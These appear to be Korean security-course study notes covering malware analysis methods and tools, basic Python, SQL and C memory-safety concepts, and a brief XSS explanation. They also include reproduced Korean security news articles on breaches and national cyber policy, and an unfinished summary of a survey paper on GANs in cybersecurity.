윱

악성코드

• 의도적으로 컴퓨터 사용자에게 피해를 주고자 만든 악의적인 프로그램
• 기존의 트로이목마, 애드웨어, 백도어, 루트킷 등의 악성코드에 더해, 최근에는 금전적 목적을 주로 드로퍼, 다운로더, 키로거, 마이너, 랜섬웨어 등 다양한 형태로 진화해 나가고 있음

관련 프로그램

머신러닝 관련: 코랩

https://sean.tistory.com/380

http://wjradburn.com/software/(PEView)

https://www.winitor.com/download(pestudio)

악성코드 분석 방법의 갈래

정적 분석

• 파일을 실행하지 않고 파일의 종류(exe, dll, doc, zip 등), 크기, 헤더(PE) 정보, Import/Export API, 내부 문자열, 실행 압축 여부, 등록 정보, 디버깅 정보, 디지털 인증서 등의 다양한 내용을 확인하는 것
• 디스어셈블러도 정적분석의 일부로 본다.

동적 분석

• 파일을 직접 실행시켜서 행위를 분석하고, 디버깅으로 코드 흐름과 메모리 상태 등을 자세히 살펴보는 것
• 파일, 레지스트리, 프로세스, 네트워크 등을 관찰하며 행위를 분석하고, 디버거를 이용해 프로그램 내부 구조와 동작 원리를 분석하기도 함

패킹 여부 확인(by. PEID), 자동화 분석(by. Cuckoo, Hybrid analysis 등)

• s/w가 리버스엔지니어링을 막기 위해 암호화하거나 실행파일을 압축하여 소스코드를 볼 수 없게 만드는 것 = 패킹
• 정적 분석: PEView, VirusTotal, strings, Dependency Walker, Resource Walker
  • IDA 같은 디스어셈블러로 내부 코드로 구조를 보는 건 고급 정적분석으로 분류
• 동적 분석: process monitor, RegShot, process explorer, wireshark, SysAnalyzer
  • Ollydbg, x64dbg 같은 디버거로 프로그램 내부 구조와 동작원리를 보는 걸 고급 동적분석으로 분류

• 메타데이터(Metadata): 기본적인 파일정보와 PE정보
• 정적정보(Static Info): 개발경로 및 문자열 등 코드 내에서 확인 가능한 정보
• 동적정보(Dynamic Info): 레지스트리, 프로세스 등 악성코드 실행 시 동작하는 주요 행위 정보
• 네트워크(Network): 악성코드 실행 시 접속 시도 및 파일/메모리 내 포함된 URL/IP
• ATT&CK Matrix: 악성코드를 전략, 전술 별(TTPs) 행위를 기술단위 별로 추출한 정보
• 기타 정보(ETC): 악성코드 함수 단위 등의 정보와 악성 문서에 대한 정보

https://github.com/a-tartarelli/malware-detection

https://github.com/OmerFarukKurklu/cnn-malware-classification

01. Python 기초

• python 설치
• Visual Studio Code 설치

02. 모듈, 프레임워크

모듈이란?

• 함수나 변수 또는 클래스를 모아 놓은 파이썬 파일
• 다른 파이썬 프로그램에서 불러와 사용할 수 있도록 만들어짐
• 모듈 < 패키지 < 라이브러리

프레임워크 Framework

• FRAME + WORK = 프레임(틀, 규칙, 법칙) + 워크(일, 소프트웨어의 목적)
• 프로그래밍에서 특정 운영 체제를 위한 응용 프로그램 표준 구조를 구현하는 클래스와 라이브러리 모임
• 목적에 따라 고민할 필요 없이 이용할 수 있도록 일괄로 가져다 쓰도록 만들어 놓은 틀

SQL

Structured Query Language: 구조화된 쿼리 언어

• 관계형 데이터베이스에 정보를 저장하고 처리하기 위한 프로그래밍 언어
• 관계형 데이터베이스란?
  • 정보를 표 형식으로 저장하며, 행과 열은 다양한 데이터 속성과 데이터 값 간의 다양한 관계를 나타내는 것
• SQL 문(query)을 사용하여 데이터베이스에서 정보를 저장, 업데이트, 제거, 검색 가능

SQL 주요 구문

SQL 실습

https://school.programmers.co.kr/learn/challenges?tab=sql_practice_kit

복습에 도움이 될 만한 인터넷 자료

• python
  • 파이썬 기초 문법
  • 모듈, 패키지, 라이브러리, 프레임워크 개념
• 모듈, 라이브러리, 프레임워크 자세히 살펴보기
  • pynput
  • matplotlib
  • flask
• 간단한 키로거 동작 원리
• SQL 개념 및 실습

01. C언어와 해킹

https://www.ciokorea.com/news/327256

• C와 C++은 메모리 안전 취약점이 없는 프로그래밍 언어 = 사이버 공격에 취약
• C와 C++은 임베디드 시스템에 많이 사용되므로 C와 C++ 활용이 그저 중단되기보다는 대안을 향한 진화가 가속화될 것

02. BOF 취약 함수

• 이러한 함수들은 사용자로부터 입력을 받을 때, 입력 크기에 대한 제한을 두지 않아 버퍼 오버플로 공격에 취약하다.
• 즉, 입력 값이 너무 클 경우 버퍼를 넘어서 메모리 영역을 침범할 수 있어, 시스템을 공격하는 데 악용될 수 있다.

03. 포인터

1. 포인터 개념

• int num; : 정수형 변수 선언
• &num: 이 변수의 메모리 주소
• printf("%p\n", &num); : num 변수의 주소값을 출력
  
  • %p는 포인터(주소값)을 출력할 때 사용하는 서식
• 메모리는 여러 칸으로 나누어져 있고, 각 칸에는 특정한 데이터가 저장된다.
  • num 변수도 메모리의 특정 위치에 저장되며, 이 위치의 주소는 &num 이다.

2. 주소값을 알면 위험할까?

• 주소값을 알면 메모리의 특정 위치에 직접 접근할 수 있다.
• 만약 주소값을 악의적인 코드에서 이용하면, 그 위치에 저장된 데이터를 조작하거나 다른 중요한 데이터를 훔쳐볼 수 있다. = 메모리 해킹

04. FORMAT STRING

• printf(str);은 입력받은 문자열을 그대로 출력하는데, 포맷 문자열 취약점이 발생할 수 있습니다. 사용자가 잘못된 포맷 문자열을 입력할 경우 예상치 못한 결과가 나올 수 있습니다.

05. JAVASCRIPT

• HTML: 웹 페이지의 구조를 정의하는 마크업 언어
• CSS: 웹 페이지의 스타일을 지정하는 스타일시트 언어
• JavaScript: 웹 페이지의 동적인 기능을 추가하는 프로그래밍 언어

https://ko.javascript.info/

06. XSS

• XSS 공격은 사용자가 신뢰하는 웹 사이트에 악성 스크립트를 삽입하여, 사이트를 방문하는 다른 사용자에게 피해를 입히는 기법입니다.
• XSS를 통해 사용자의 쿠키, 세션 정보 등이 탈취될 수 있으며, 이를 방지하기 위해서는 웹사이트의 입력값을 철저히 검증하고 필터링해야 한다.

기사 원문

개인정보 암호화한 11자리 ‘홈넘버’ 활용, 배송과정 고객 개인정보 노출 최소화

[보안뉴스 박미영 기자] 롯데홈쇼핑은 고객 개인정보 보호를 위해 운송장에서 고객 이름, 연락처를 제거한 ‘보안택배 서비스’를 업계 최초로 도입했다.

최근 유통업계의 고객 개인정보 유출 사례가 늘고 있다. 외부 해킹은 물론 시스템 오류, 휴먼 에러 등 다양한 경로로 개인정보 유출 피해가 발생해 소비자의 불안감이 증폭되고 있다.

롯데홈쇼핑은 2013년 택배 운송장에 주문자의 실제 연락처 대신 가상 전화번호를 부여해 고객 연락처 유출을 방지하는 ‘안심번호 서비스’를 시행했다. 이어 2017년 전화 상담 주문 시스템에 일회용 보안 토큰 결제 기술을 적용한 간편 결제 서비스를 도입하는 등 고객 개인정보 보호를 위한 시스템을 선도적으로 도입해 왔다.

롯데홈쇼핑은 보안 체계를 고도화해 고객 정보 유출 사고를 사전에 방지하기 위해 업계 최초로 고객 이름, 연락처를 제거한 ‘보안택배 서비스’를 도입했다.

‘보안택배 서비스’는 개인정보 대신 이름, 연락처 등의 정보를 암호화한 ‘홈넘버’를 입력해 온라인으로 구매한 상품을 배송받을 수 있는 서비스다. 보안 솔루션 업체 ‘홈넘버 메타’가 개발한 서비스로, 택배 운송장에 고객 이름·연락처 대신 개인별 식별번호인 ‘홈넘버’를 부여해 개인정보 노출로 인한 피해를 방지할 수 있다. ‘보안택배 서비스’ 이용을 희망하는 고객은 롯데홈쇼핑 모바일앱에서 주문 후 배송 방법으로 ‘보안택배’를 선택하고 ‘홈넘버’에 가입하면 된다. 택배 운송장에는 가입 후 발급받은 ‘홈넘버’가 보이며, 이를 통해 본인의 주문 상품 여부를 확인할 수 있다. 향후 이름·연락처뿐만 아니라 주소지도 ‘홈넘버’에 포함해 고객 정보보안을 더욱 강화할 예정이다.

한편, 롯데홈쇼핑은 개인정보 보호의 중요성을 인지하고, △개인정보 보호 교육을 통한 임직원 보안의식 내재화 △고객 개인정보 처리 시스템 구축 △취약점 진단 및 모의해킹 정기 이행 △파트너사 대상 개인정보 보호 현황 정기 점검 등을 통해 정보보안 강화를 위해 노력하고 있다.

조영구 롯데홈쇼핑 정보보안실장은 “개인정보 유출 문제가 심각해지며 소비자 불안이 심화되고 있는 가운데 업계 최초로 고객의 이름, 연락처 없이 상품을 배송하는 ‘보안택배 서비스’를 도입하게 됐다”며, “향후 고객 개인정보 보호를 강화를 위한 다양한 제도와 서비스를 마련해 기업 신뢰도를 높여 나가겠다”라고 말했다.

출처:[박미영 기자(mypark@boannews.com)]

기사 원문

• 출처: 조광형 기자
• 이화여대 "3일 통합정보시스템 해킹 피해 확인"
• 연락처·주민번호 등 외부서 조회 ‥
• 파장 커질 듯학교 측 "보안점검 강화, 재발방지책 마련할 것"

이화여자대학교 통합정보시스템이 '해킹 공격'을 받아 일부 졸업생(1982~2002년 입학)들의 연락처·주민등록번호 등 개인 신상정보가 외부로 유출되는 사건이 발생했다.

김은미 이화여대 총장은 지난 4일 이화여대 졸업생들에게 보낸 공지문에서 "학교는 최근 내부 보안시스템을 통해 통합정보시스템에 대한 비정상적인 접근 시도를 인지하게 됐고, 현재 점검 중에 있음을 알려드린다"고 밝혔다.

김 총장은 "전날인 9월 3일 실시간 모니터링 중 '해외 IP'의 비정상적 접근을 감지했다"며 "이에 오전 11시 55분경 즉각적으로 보안시스템을 통해 비정상적 접근을 차단했고, 만에 하나 있을 수 있는 피해가 발생했는지 상세 조사를 하고 있다"고 밝혔다.

"접근 시도 대상은 1982학년도에서 2002학년도에 입학한 졸업생이며 대부분 20여 년 간 업데이트되지 않은 정보"라고 설명한 김 총장은 "보안시스템의 사전 차단으로 재학생 데이터 관련 접근 시도는 없었다"고 덧붙였다.

김 총장은 "학교는 이번 사안의 심각성을 엄중하게 인식하고 있고, 현재 내부 시스템 점검 및 강화, 유관기관과의 협력 등을 통해 추가적인 피해 가능성을 차단하고 있다"며 "개인정보 유출 여부가 확인될 경우 즉시 통지하고, 주의사항 안내, 관련된 피해 상담 등을 하는 민원센터를 운영해 최대한 신속하게 안내하도록 하겠다"고 밝혔다.

이어 "졸업생들은 개인정보 보호를 위해 의심스러운 이메일과 문자메시지 또는 전화를 통한 피싱 시도에 주의하시고, 개인정보로 추측 가능한 비밀번호를 사용하시는 경우 비밀번호를 변경하시기를 권장드린다. 동창 여러분께 심려를 끼쳐드려 죄송하다"고 사과했다.

이화여대에서 정보침해대응단 위원장을 맡고 있는 신경식 연구·대외부총장은 6일 학교 홈페이지에 올린 추가 공지 글에서 "학교는 통합정보시스템에 대한 비정상적인 접근 시도를 인지한 직후부터 면밀한 조사와 보안 분석을 진행한 결과, 통합정보시스템이 해킹 공격을 받아 일부 졸업생 여러분의 개인정보가 외부에서 조회된 사실을 확인했다"고 밝혔다.

신 부총장은 "지난 3일 불법 시도 감지 후 즉각적으로 비정상적인 접근을 차단했으나, 안타깝게도 지난 5일 오전 11시 경 1982학년도에서 2002학년도에 입학한 졸업생 일부의 성명, 주민등록번호, 연락처, 이메일주소, 주소, 학적정보 등과 이들 졸업생 일부의 보호자 정보가 유출된 것을 확인했다"고 부연했다.

이어 "유출된 정보에는 성적이나 재학생 관련 정보는 포함돼 있지 않다"고 덧붙인 신 부총장은 "이번 공격은 보안시스템이 사전에 감지하기 어려운 것이었으나, 담당자 모니터링을 통해 선제적으로 접속을 차단함으로써 피해를 최소화할 수 있었다"고 강조했다.

신 부총장은 "학교는 신속히 교육부와 개인정보보호위원회에 신고를 진행했고, 추가 피해가 발생하지 않도록 기관에 적극 협조 및 대응하고 있다"며 "현재까지 본 사고에 따른 개인정보 악용 의심 사례는 없는 것으로 파악되나, 혹시 모를 피해를 방지하기 위해 출처가 불분명한 이메일, 문자 및 연락 등을 수신하시는 경우 민원센터(02-3277-5501, privacy@ewha.ac.kr)로 연락 주시면 성실하게 상담해 드리도록 하겠다"고 공지했다.

신 부총장은 "이와 같은 일이 다시 일어나지 않도록 사고 원인을 면밀하게 분석해 시스템 점검, 보안시스템 강화, 주기적인 보안점검을 강화하고 재발방지 대책을 철저히 마련하겠다"며 "졸업생 여러분께 우려를 끼쳐드린 점 다시 한번 사과드린다"고 밝혔다.

기사 원문

국가정보원 ‘CSK 2024’ 개최... NCSC, ‘대한민국 사이버안보 정책 방향’ 발표
‘국가 망 보안정책 개선 로드맵’, ‘전 공공분야 국제표준암호 AES 허용 계획’도 공유

[보안뉴스 김영명 기자] 국가정보원과 국가보안기술연구소가 공동주최하는 CSK 2024(Cyber Summit Korea 2024)가 9월 10일부터 12일까지 코엑스 컨퍼런스룸에서 개최됐다. CSK 2024는 ‘A Step Ahead for Global Cybersecurity-At the Beginning of the AI, Quantum and Space Era’(글로벌 사이버 보안을 위한 한 걸음-인공지능, 양자 및 우주시대의 시작)를 주제로 개최됐다.

행사 둘째 날 오후, ‘Strategy & Action’ 파트에서는 국가안보실 신용석 사이버안보비서관을 좌장으로 해 ‘전략 및 국제협업’ 세션이 진행됐다. 먼저 국가사이버안보센터(NCSC) 법제도과장이 ‘대한민국 사이버안보 정책 방향’에 대해, NCSC 관계자가 ’ 국가 망 보안정책 개산 로드맵(안)‘을, 마지막으로 NCSC의 또 다른 관계자가 ‘전 공공분야 국제표준암호 AES 허용 계획’을 주제로 발표를 이어갔다.

먼저 NCSC 과장은 “우리 정부의 사이버안보 전략의 변화를 보면, 북한 등의 공격이 꾸준히 이어졌지만 사이버안보 개념은 오랜 기간 정립되지 못했다”며 “실체적 위협 주체의 인식이 부족했고, 사이버안보 업무 입법례가 전무했다”고 말했다. 이어 “북한 등 사이버 위협의 주체는 가상자산 탈취와 국가기밀·첨단기밀 유출 등을 이어가고 비대면 사회로 전환하면서 사이버공간의 의존성 심화와 함께 주요국의 사이버안보 강화 및 국가간 협력이 증가하고 있다”라고 말했다.

현행 법체계에 부합하는 국가 사이버안보 수행체계를 살펴보면 사이버안보 컨트롤타워는 국가안보실로 국가 사이버안보 업무 전반을 조율하고 중장기 정책방향의 수립·검토를 맡았다. 국가정보원은 실무 주관기관으로 국정원법에 근거해 해킹조직 등 사이버안보 정보 업무, 북한·외국 등의 안보침해행위를 확인하고 견제·차단하며 국민안전과 보호를 위한 대응조치를 담당하는 민·관 통합대응체계로 운영하고 있다. 개별부처는 소관 분야의 보안·보호를 담당하고 있다.

정부의 사이버안보 전략의 비전은 ‘사이버공간에서 자유, 인권, 법치의 가치를 수호하며 국제사회에 역할과 책임을 다하는 글로벌 중추국가’로 ‘공세적 사이버 방어 및 대응’, ‘글로벌 리더십 확장’, ‘건실한 사이버 복원력 확보’의 세 축 아래 5개 전략 과제로 진행되고 있다.

5대 전략 과제를 살펴보면 먼저 ‘공세적 사이버 방어 및 대응’에서는 △국제 및 국가배후 해킹조직 대응 정보·수사기관 활동, 군 사이버작전 역량·협업 강화 △해킹 행적 국내 디지털정보 수집, 해킹조직 근원지의 정찰·첩보활동 강화 법제도 개선 △해외발 허위정보 유포 탐지기술 개발, 영향력공작 대응 법제도 개선 등 △사이버범죄 수사 핵심기술 발굴 및 전문인력 양성 역량 제고 등이 있다. ‘글로벌 사이버 공조체계 구축’에서는 △자유민주주의 가치 공유 국가들과의 협력 강화 △북한 사이버위협에 국제사회 공조 주도 △국제 사이버범죄 수사 고도화 △랜섬웨어 확산 방지 등 국제규범 논의 및 신뢰구축조치 이행 활동에 적극 참여 등이 있다.

‘국가 핵심인프라 사이버 복원력 강화’로는 △제로트러스트 보안정책 추진 △다층보안체계(MLS) 중심 공공보안체계 개선 △ICT 공급망 보안정책 및 대응체계 확립 △주요 정보통신기반시설, 국가정보자원관리원 등 보안관리 내실화 등이 있다. ‘신기술 경쟁우위 확보’에서는 △사이버보안 R&D 확대 △산·학·연 협업 기반 정보보호 산업 생태계 조성 △‘K-시큐리티 얼라이언스’ 구성 및 정보보호 산업 해외진출 활성화 △양자컴퓨팅 대응 암호체계 구축 등이 있다.

‘업무 수행기반 강화’로는 △민·관 합동 통합대응조직 역량 강화 및 사이버안보 정보협력 허브 고도화 △군 RMF 제도 발전 등 분야별 소관부처 책임 정립 △합동분석 등 민간 역량 활용 확대 △국제 사이버훈련센터 구축·군 전문인력 양성 등 국민 정보보호 인식 강화 등이 있다.

NCSC 과장은 “사이버안보 컨트롤타워인 대통령실 국가안보실과 국정원은 5대 전략과제와 29개 세부실천과제의 구체적인 실천계획을 마련하고 착실히 이행할 계획”이라고 밝혔다.

다음으로 국가정보원 국가사이버안보센터에서 ’국가 망 보안정책 개선 로드맵(안)’을 발표했다. 현재 망분리 정책은 국가 업무환경에 높은 보안성을 제공하지만, AI 및 클라우드 등 신기술 적용과 공공데이터 활용에 제약이 많다. 정부는 올해 1~4월에 국가 망 보안정책 개선 추진계획을 마련하고, ‘국가 망 보안정책 개선 TF’ 구성 및 다층보안체계 전환 로드맵(안)을 수립하면서 각계 현장 의견도 수렴했다.

개선 방 안에서 추진 목표는 획일적인 망 분리 탈피, 다층보안체계 기반의 보안정책 패러다임 전환, 제약 없는 정보 유통으로 신기술 융합 강화 및 스마트 업무환경 조성, 산학연관 전문가와 실효적인 정책 개발 및 기관 자율보안 개념 접목, 신속 추진하되 점진적인 제도변화로 안정적인 정책 안착, 다양한 산업부문의 경제 창출 및 시장 변화 반영 등으로 정했다.

다층보안체계 개념은 업무 중요도별로 기밀(Classified)·민감(Sensitive)·공개(Open) 등급으로 분류, 등급별 차등적 보안통제로 보안성 확보와 원활한 데이터 공유를 함께 달성할 수 있다. 다층보안체계 적용 절차는 ‘다층보안체계 적용 위한 정보서비스 현황 파악 및 분석’-‘업무 중요도에 따라 정보시스템 대상 C/S/O 등급 분류’-‘정보서비스 구성환경 모델링 및 모델링 평가’-‘보안원칙 따라 보안통제 선정’-‘등급분류·보안통제 적절성 평가·재조정’의 단계를 거친다.

망 보안정책 개선 로드맵의 추진과제는 ①인터넷 단말의 업무 효율성 제고 ②업무환경에서 생성형 AI 활용 ③외부 클라우드 활용 업무협업 체계 ④업무 단말의 인터넷 이용 ⑤공공 데이터의 외부 AI 융합 ⑥연구 목적 단말의 신기술 활용 ⑦개발 환경 편의성 향상 ⑧클라우드 기반 통합 문서체계 등으로 구성됐다.

국가사이버안보센터 관계자는 “정부는 올해까지 다층보안체계 기반을 마련하고 2025년 하반기까지는 다층보안체계 시행 및 고도화를, 2026년부터는 다층보안체계 전환 가속화를 추진한다”며 “세부 추진사항은 다층보안체계 관련 규정 개정, 클라우드 보안기준 재정립, 디플정위 주관 시범사업 추진, 공공부문 보안검증 제도 개편, (가칭) 국가사이버안보 프레임워크 수립, 다층보안체계·보안통제기술 개발, AI·클라우드 연계 보안기술 개발, 사이버보안 실태평가 개편 등이 있다”라고 말했다. 이어 “이번 개선안을 통해 디지털플랫폼정부 구현 기여, 다양한 시장 확대로 디지털 경제 창출, 다양한 민관 융합서비스 개발 및 우수한 대국민 공공서비스 제공, 행정업무 효율성·업무 협업 극대화 및 스마트오피스 실현 등의 효과를 거둘 수 있다”며 발표를 마쳤다.

마지막으로 NCSC 관계자가 ‘전 공공분야 국제표준암호 AES 허용 계획’에 대해 발표했다. NCSC 관계자는 “우리나라는 사이버안보 강국인 만큼 이에 걸맞은 사이버안보 정책이 필요하다는 판단하에 산·학·연 의견을 추가해 AES를 허용하기로 했다”고 말했다. 이 관계자는 “국산 블록암호는 SEED, ARIA, HIGHT, LEA 등이 있고 데이터 보호용 블록암호에는 국산 암호만 허용하고 있다”며 “2005년 제도 시행 당시 외산 암호의 해독 가능성 우려로 불허했는데 이는 국내 산업 보호, 암호연구 활성화, 인력 양성 등 긍정적 효과를 가져왔다”고 강조했다.

이 관계자는 “AES 허용 로드맵을 살펴보면 올해 9월에 AES 허용을 발표하고, 2025년 상반기에는 ‘안전한 AES 암호모듈 구현방법론’을 제공하며, 내년 7월에는 AES 자가시험도구를 공개해 안전한 구현여부를 1차로 확인할 수 있는 온라인 서비스를 제공하고 하반기에 검증 수요 증가에 대비해 시험기관을 3개 이상 추가 지정하기로 했다”며 “2026년 1월에 AES의 사용을 허용하며 AES 탑재 암호모듈 대상 KCMVP 신청 접수와 함께 상반기에는 KCMVP를 획득한 AES를 탑재하고 주요 공공기관에 AES가 탑재된 제품을 도입할 계획”이라고 밝혔다.

출처: [김영명 기자(boan@boannews.com)]

[보안 용어 정리]

• 다층 보안 체계(MLS): Multi Level Security, 정보의 중요도에 따라 보안 통제 수준을 달리함으로써 데이터 공유를 원활하게 하고, 중요 정보에 대한 보안성은 강화시킴
• AES(국제 표준 암호): 블록 암호를 사용하여 암호화 및 복호화를 진행하는 대표적인 암호화 알고리즘
• 망 분리: 외부 인터넷망을 통한 불법적인 접근과 내부 정보 유출을 차단시키기 위해 업무망과 외부 인터넷망을 분리하는 망 차단조치

기사 원문

계정정보 유출은 2배 이상 늘고, 스팸문자는 7배 증가

[보안뉴스 김경애 기자] 지난해에는 랜섬웨어, 정보유출, 디도스, 가상자산 해킹, 공급망 공격 등이 주를 이룬 것으로 드러났다. 또한 사이버 공격 통계를 보면 스팸문자가 7배 급증했으며, 계정정보 유출은 2배 이상 증가한 것으로 조사됐다.

1. 랜섬웨어, 비용 지불 가장 많아
첫째, 랜섬웨어 피해가 기승을 부린 것으로 나타났다. ‘2023년 최근 사이버 위협 동향’에 대해 한국인터넷진흥원(이하 KISA) 김홍석 팀장은 ‘CSK 2024’ 강연을 통해 “사이버 침해사고가 지속적으로 증가하고 있다”며 “랜섬웨어는 전년 대비 감소했지만 랜섬웨어 피해자의 약 78%가 중소기업으로, 2023년 랜섬웨어 감염으로 인한 비용 지불이 1조 5천억원에 달해 가장 많이 지불한 해로 기록됐다”며 중소기업 피해의 심각성을 알렸다.

이어 김 팀장은 “주로 제조업을 대상으로 피해가 많이 발생했다”며 “공격자는 랜섬웨어에 감염시키고, 랜섬노트를 통해 특정 아이디와 패스워드 입력을 유도한 후 비트코인 지불을 요구하거나, 개인정보를 먼저 탈취한 뒤 랜섬웨어에 감염시킨 후 추가로 정보를 유출하겠다며 협박한다”고 말했다. 만약 피해 기업이 응하지 않을 경우 피해기업 서비스에 공격을 감행한다고 부연했다.

공격자는 주로 제조사를 타깃으로 메일 서버를 노렸다. 구버전의 MS 서버가 외부에 노출돼 있는 것을 노린 공격자는 업무망을 랜섬웨어에 감염시켜 협박한 후 돈을 요구했다. 또한 기업의 잘못된 백업으로 NAS까지 랜섬웨어에 감염시키는 피해 사례도 발생했다.

김 팀장은 “백업의 경우 분리된 별도의 망에서 이뤄져야 하는데, 업무망과 같은 곳에 있는 NAS에 백업해 NAS까지 랜섬웨어에 감염된 사례가 있다”며 “내부자산에 대해 면밀히 살펴보고 검사 및 점검해야 한다”며 내부자산 관리와 백업의 중요성을 강조했다.

또한 김 팀장은 “랜섬웨어의 경우 랜섬웨어 서비스 플랫폼이 유통되고 있어 지식 없이 비용 지불만 하면 악성코드 유포, 거래 협상, 피해기업이 지불한 비용 회수 등 분업된 조직을 이용할 수 있다”며 주의를 당부했다.

2. 계정정보 유출, 2배 이상 늘어
둘째, 정보 유출이다. 그중 계정정보 유출은 지난해 기준 두 배 이상 늘었다. 이는 공격자가 하나의 계정을 다른 여러 사이트에 동일하게 사용하는 것을 노리고, 정보수집에 집중했기 때문이다. 여기에는 브라우저 자동 로그인을 악용한 공격도 한 몫했다.

3. 디도스 공격, IoT 기기 중심으로 발생
셋째, 디도스 공격이다. 올해 상반기 사고 사례는 미라이 공격이 주를 이뤘다. 디도스 공격이 IoT 기기에 집중됐다는 얘기다. 김홍석 팀장은 “디도스 침해사고 대부분은 IoT에서 발생했다”며 “IoT 기기는 제조사의 IoT 인베디드 소스코드로 구성돼 있어 제조사 협조 없이는 분석이 쉽지 않아 무엇보다 협조가 중요하다”며 “제조사가 보안 인식 없이 IoT 기기를 출시할 경우 문제가 발생할 수 있고, IoT 기기가 출시되더라도 사용자의 보안 인식 부족으로 인해 침해사고가 발생한다”고 설명했다.

4. 스팸 문자, 7배 급증
넷째, 스팸 및 스미싱 공격 증가다. 특히 올해는 지난해보다 큰 폭으로 증가한 것으로 나타났다. 올해 1~5월까지 1억 6,862만원으로, 지난해의 절반을 넘어선 것으로 집계됐다. 특히 2023년의 경우 2억 9,550만원으로 전년대비 7배 급증했다.

이와 관련 김홍석 팀장은 “공격자가 특정 솔루션 ERP 취약점을 이용해 서버에 침투한 후 DB 권한을 탈취, 계정정보를 이용해 스팸 문자를 대량으로 발송했다”며 “피해 기업 중에는 고객사에게 안내 문자를 발송하기 위한 문자 연동을 악용해 발송한 사례도 있다”고 설명했다.

이렇게 공격자가 악용해 발송한 스팸 문자는 성인, 도박, 구인구직, 기관 사칭 스미싱으로 진화됐다. 또한 해커 입장에서는 스미싱 문자를 발송하기 위한 비용이 발생하지 않고 피해 기업에 과금을 넘겨 피해를 키웠다. 하지만 피해 기업에서는 한 달후 과금된 것을 알 수 있어 피해 사실을 바로 인지하지 못하는 경우가 적지 않다.

이러한 피해를 막기 위한 대응전략으로 김 팀장은 “기업 내부에서 지속적인 모니터링을 통해 식별과 분석에 집중하고, 인텔리전스 협의체를 통한 정보 공유, 위협헌팅을 활용한 대응에 집중해야 한다”고 강조했다.

보안 인력이 부족한 중소기업의 경우 KISA에서 개발한 해킹 진단도구를 활용해 해킹 여부를 확인하고 신고 접수할 것을 당부하며, 올해는 리눅스 기반의 해킹 진단도구를 개발해 내년에 보호나라 사이트를 통해 배포할 것이라고 밝혔다.

출처: [김경애 기자(boan3@boannews.com)]

[보안 용어 정리]

• 랜섬웨어(Ransomware): 악성 소프트웨어로, 사용자의 파일을 암호화하거나 시스템을 잠그고, 이를 복호화하거나 해제하기 위해 금전을 요구하는 소프트웨어
• 랜섬노트(Ransom Note): 랜섬웨어 공격자가 피해자에게 보내는 메시지로, 파일 복호화 방법이나 금전을 지불해야 하는 정보를 담고 있다.
• NAS(Network-Attached Storage): 네트워크를 통해 접근할 수 있는 저장 장치, 파일 서버의 역할을 하며, 네트워크에 연결된 여러 장치에서 파일을 공유하고 저장할 수 있다.
• 디도스(DDoS, Districbuted Denial of Service): 여러 대의 컴퓨터를 이용해 특정 서버나 네트워크에 과도한 트래픽을 발생시켜 서비스의 정상적인 운영을 방해하는 공격

<논문 원본>

A Survey on the Application of Generative Adversarial Networks in Cybersecurity: Prospective, Direction and Open Research Scops - Md Mashrur Arifin

<논문 요약>

1. Introduction

• GAN은 두 개의 신경망(Generator와 Discriminator) 간의 경쟁을 통해 현실적인 데이터를 생성해 내는 모델인데, 이를 활용해 보안 시스템에서 위협을 감지하고 대응할 수 있으며, 예측 능력을 강화하는 데 유리하다.
• GAN(gereraive adversiarial network): VAE, dffiusion model과 같은 생성 모델의 한 종류로써 데이터를 생성하는 generator와 데이터를 구별하는 discriminator가 경쟁하는 과정을 통해서 데이터를 학습한다.
• Generator: 최대한 실제처럼 보이는 데이터를 생성함으로써 discriminator를 속이려고 시도
• Discriminator: 실제 데이터와 만들어진 가짜 데이터를 구별

2. Related Works

• Intrusion Detection System (IDS): GAN을 이용하여 비정상적인 네트워크 활동을 감지하는 방법으로 IDS에서 GANs는 정상적인 네트워크 트래픽을 모델링하여 비정상적인 행위를 탐지하는 데 효과적이다. 예를 들어, GAN이 정상적인 트래픽 패턴을 학습하면, 공격자가 네트워크에 침입했을 때의 비정상적인 패턴을 보다 쉽게 탐지할 수 있다.
• Malware Detection: 기존의 악성 코드 탐지 시스템은 시그니처 기반 탐지법이나 행위 분석에 의존하는 경우가 많습니다. 하지만 GAN은 기존 탐지 방법으로는 발견되지 않는 새로운 변종 악성 코드를 생성하고 이를 탐지할 수 있도록 모델을 강화할 수 있는 방법을 제시한다.
• Anomaly Detection: 비지도 학습으로 GAN을 사용해 이상 탐지를 수행하는 방법이 논의된다. 이 방법은 정상적인 패턴과 다른 데이터를 생성하는 데 효과적이며, 이를 통해 이전에 발견되지 않았던 위협을 탐지하는 데 유용할 수 있다.

3. GAN 종류

• Vanilla GAN: 기본적인 GAN 모델로, Generator와 Discriminator 간의 경쟁이 반복되면서 점점 더 현실적인 데이터를 생성한다. 사이버 보안에서는 새로운 악성 코드나 이상 행동을 시뮬레이션하는 데 사용될 수 있다.
• Conditional GAN (cGAN): 특정 조건(예: 라벨)을 추가하여 원하는 조건에 맞는 데이터를 생성을 하는데 예를 들어, 특정 유형의 악성 코드 또는 네트워크 패턴에 대한 데이터를 생성하여 더 목표 지향적인 보안 모델을 구축하는 데 유리하다.
• Wasserstein GAN (WGAN): 기존 GAN에서 발생하는 불안정한 훈련 문제를 해결하기 위해 제안된 모델로, 더 안정적이고 일관된 훈련 결과를 제공하는데 보안 분야에서는 정확하고 신뢰성 있는 데이터 생성을 위해 사용할 수 있다.

4. Gan 모델 비교 분석 및 장단점

• Vanilla GAN: 간단하지만 훈련 과정이 불안정하고, 사이버 보안에 적용할 때 성능이 변동될 수 있다.
• WGAN: 더 안정적이지만 훈련 속도가 느리며, 구현이 복잡하다.
• cGAN: 특정 조건을 반영한 데이터 생성을 통해 보안 문제에 더 효과적으로 대응할 수 있지만, 조건 설정이 어렵다는 단점이 있다.

5. Cybersecurity Challenges

• 적대적 공격: GAN 자체가 적대적 예제(Adversarial Examples)를 생성할 수 있기 때문에, 공격자가 GAN을 악용해 보안 시스템을 우회하거나 혼란을 일으킬 수 있다.
• 데이터 부족: 사이버 보안에서 사용할 수 있는 고품질의 레이블이 붙은 데이터가 부족한 경우, GAN을 사용해 데이터를 증강하는 방법이 있지만, 이러한 데이터가 항상 효과적인 것이 아닌 문제가 있다.
• 모델 불안정성: GAN 훈련의 불안정성 문제도 문제점 중 하나로 제시된다. 특히 보안 분야에서는 신뢰성 있는 데이터가 중요한데, GAN이 항상 높은 품질의 데이터를 생성하는 것은 아니기 때문에 이러한 불안정성이 문제로 이어진다.

6. 사용 사례 및 응용

